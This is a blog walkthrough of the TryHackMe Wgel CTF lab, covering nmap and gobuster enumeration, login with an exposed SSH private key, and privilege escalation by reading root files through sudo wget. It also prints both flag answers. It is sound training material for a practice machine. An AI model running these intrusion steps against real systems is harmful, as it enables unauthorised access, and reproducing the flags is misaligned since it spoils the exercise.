Tryhackme - Wgel CTF

Tryhackme – Wgel CTF

Leave a Comment / CTF, Tryhackme / By

In this walk through, we will be going through the Wgel CTF room from Tryhackme. This room is rated as Easy on the platform and is developed to test our enumeration, exploitation and privilege escalation skills. So, let’s get started without any delay.

Wgel CTF

Machine Info:

TitleWgel
IPaddress10.10.173.195
DifficultyEasy
ObjectiveCan you exfiltrate the root flag?

Enumeration:

  • Checking if machine is live or not.

pinging the target

  • Starting with our regular nmap scan. Found two ports open – 22 and 80 (SSH and HTTP)

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.173.195
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-18 22:11 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.173.195, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:59811 > 10.10.173.195:53 S ttl=37 id=34865 iplen=44  seq=428394123 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.173.195, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:59812 > 10.10.173.195:53 S ttl=48 id=26178 iplen=44  seq=428459658 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.173.195, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:59813 > 10.10.173.195:53 S ttl=48 id=27998 iplen=44  seq=428525193 win=1024 <mss 1460>
Nmap scan report for 10.10.173.195
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds

nmap scan

  • The port 80 serves the default apache page. Nothing fancy. Next, when i was going through the source code of the page found out a potential username – Jessie via comments.

HTML source code comments

  • Firing up gobuster reveals a directory called sitemap. In there we found a webiste running.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.173.195/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.173.195/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/18 22:13:47 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11374]
/server-status        (Status: 403) [Size: 278]  
/sitemap              (Status: 301) [Size: 316] [--> http://10.10.173.195/sitemap/]
                                                                                   
===============================================================
2023/04/18 22:15:40 Finished
===============================================================

gobuster scan

Home Page

  • Nothing juicy on the the default template. Fired up the gobuster again. Find a directory called .ssh. In there, we found a private key.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.173.195/sitemap -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.173.195/sitemap
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/18 22:19:10 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.173.195/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.173.195/sitemap/css/] 
/fonts                (Status: 301) [Size: 322] [--> http://10.10.173.195/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.173.195/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]                                         
/js                   (Status: 301) [Size: 319] [--> http://10.10.173.195/sitemap/js/]    
                                                                                          
===============================================================
2023/04/18 22:21:01 Finished
===============================================================

gobuster scan

.ssh

id_rsa

Trending
I created a Music Player in Python – “Pythiofy”

Exploitation:

  • Changing the permissions of the private key and using the username mentioned the home page’s source code. We have our way in.

chmod 600 id_rsa
ssh -i id_rsa [email protected]

ssh login

user flag

Privilege Escalation:

  • Checked if any any sudo misconfiguration we can exploit. Found the wget binary which can be run with sudo permissions and do not require a password.

jessie@CorpOne:/$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

sudo -l

  • Used GTFObins in order to leverage the priv esc vector.

GTFObins File read

  • Got the root flag! in the error response of the wget.

jessie@CorpOne:/tmp$ sudo /usr/bin/wget -i $LFILE
--2023-04-18 20:06:11--  http://b1b968b37519ad1daa6408188649263d/
Resolving b1b968b37519ad1daa6408188649263d (b1b968b37519ad1daa6408188649263d)... failed: Name or service not known.
wget: unable to resolve host address ‘b1b968b37519ad1daa6408188649263d’

root flag

Task 1 – Wgel CTF

Question 1 – User flag

057c67131c3d5e42dd5cd3075b198ff6

Question 2 – Root flag

b1b968b37519ad1daa6408188649263d

Task 1 - Wgel CTF

Also Read: Tryhackme – Wazuh

Conclusion:

Conclusion

So that was “Wgel CTF” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found common ports opened – 22 (SSH) and 80 (HTTP). Further, we started enumerating the HTTP web server running by bruteforcing directories using gobuster recursively. Found a SSH key on one of the directories and got our initial foothold via SSH. For the privilege escalation part, used GTFObins wget file read exploit to escalate our privileges and get the root flag. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top